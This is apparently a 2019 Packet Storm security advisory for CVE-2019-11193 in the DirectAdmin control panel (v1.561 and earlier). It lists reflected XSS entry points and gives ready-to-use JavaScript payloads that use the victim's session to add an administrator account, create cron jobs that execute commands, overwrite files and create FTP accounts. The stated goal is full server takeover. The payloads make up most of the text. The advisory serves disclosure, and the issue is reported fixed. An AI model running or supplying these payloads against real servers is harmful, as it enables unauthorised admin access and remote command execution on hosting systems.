DirectAdmin 1.561 Cross Site Scripting

2019-04-12T00:00:00
ID PACKETSTORM:152494
Type packetstorm
Reporter Numan OZDEMIR
Modified 2019-04-12T00:00:00

Description

                                        
# Title: DirectAdmin Multiple Vulnerabilities to Takeover the Server <= v1.561  
# Date: 12.04.2019  
# Author: Numan OZDEMIR  
# Vendor Homepage: https://www.directadmin.com/  
# Version: Up to v1.561.  
# CVE: CVE-2019-11193  
# info@infinitumit.com.tr && root@numanozdemir.com  
# Detailed: https://numanozdemir.com/respdisc/directadmin.pdf  
  
# Description:  
# Multiple security vulnerabilities have been discovered in the popular server control panel DirectAdmin by InfinitumIT.  
# Attackers can chain these vulnerabilities to perform critical actions, up to taking over control of the server.  
# The vulnerabilities (Cross Site Scripting and Cross Site Request Forgery) can be combined to:  
# add an administrator, execute commands remotely (RCE), take a full backup of the server and upload it to an attacker-owned server, upload a webshell, and more.  
  
# Reflected XSS Vulnerabilities:  
# https://SERVERIP:2222/CMD_FILE_MANAGER/XSS-PAYLOAD  
# https://SERVERIP:2222/CMD_SHOW_USER?user=XSS-PAYLOAD  
# https://SERVERIP:2222/CMD_SHOW_RESELLER?user=XSS-PAYLOAD  
  
# Example Payloads:  
# Add Administrator:  
var url = "http://SERVERIP:2222/CMD_ACCOUNT_ADMIN";  
var params = "fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&email=test%40test.com&passwd=password&passwd2=password&notify=ye";  
var vuln = new XMLHttpRequest();  
vuln.open("POST", url, true);  
vuln.withCredentials = true;  
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");  
vuln.send(params);  
  
# Remote Command Execution by Cron Jobs:  
var url = "http://SERVERIP:2222/CMD_CRON_JOBS";  
var params = "action=create&minute=*&hour=*&dayofmonth=*&month=*&dayofweek=*&command=command";  
var vuln = new XMLHttpRequest();  
vuln.open("POST", url, true);  
vuln.withCredentials = true;  
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");  
vuln.send(params);  
  
# Edit File:  
var url = "http://SERVERIP:2222/CMD_ADMIN_FILE_EDITOR";  
var params = "file=the-file-full-path&action=save&text=new-content";  
var vuln = new XMLHttpRequest();  
vuln.open("POST", url, true);  
vuln.withCredentials = true;  
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");  
vuln.send(params);  
  
# Create FTP Account:  
var url = "http://SERVERIP:2222/CMD_FTP";  
var params = "fakeusernameremembered=&fakepasswordremembered=&action=create&domain=infinitumit.com.tr&user=username&passwd=password&random=Save+Password&passwd2=password&type=domain&custom_val=%2Fhome%2Fusername&create=Create";  
var vuln = new XMLHttpRequest();  
vuln.open("POST", url, true);  
vuln.withCredentials = true;  
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");  
vuln.send(params);  
  
  
# Vulnerabilities are fixed in minutes, thanks to DirectAdmin.  
# InfinitumIT / For safer days...  
  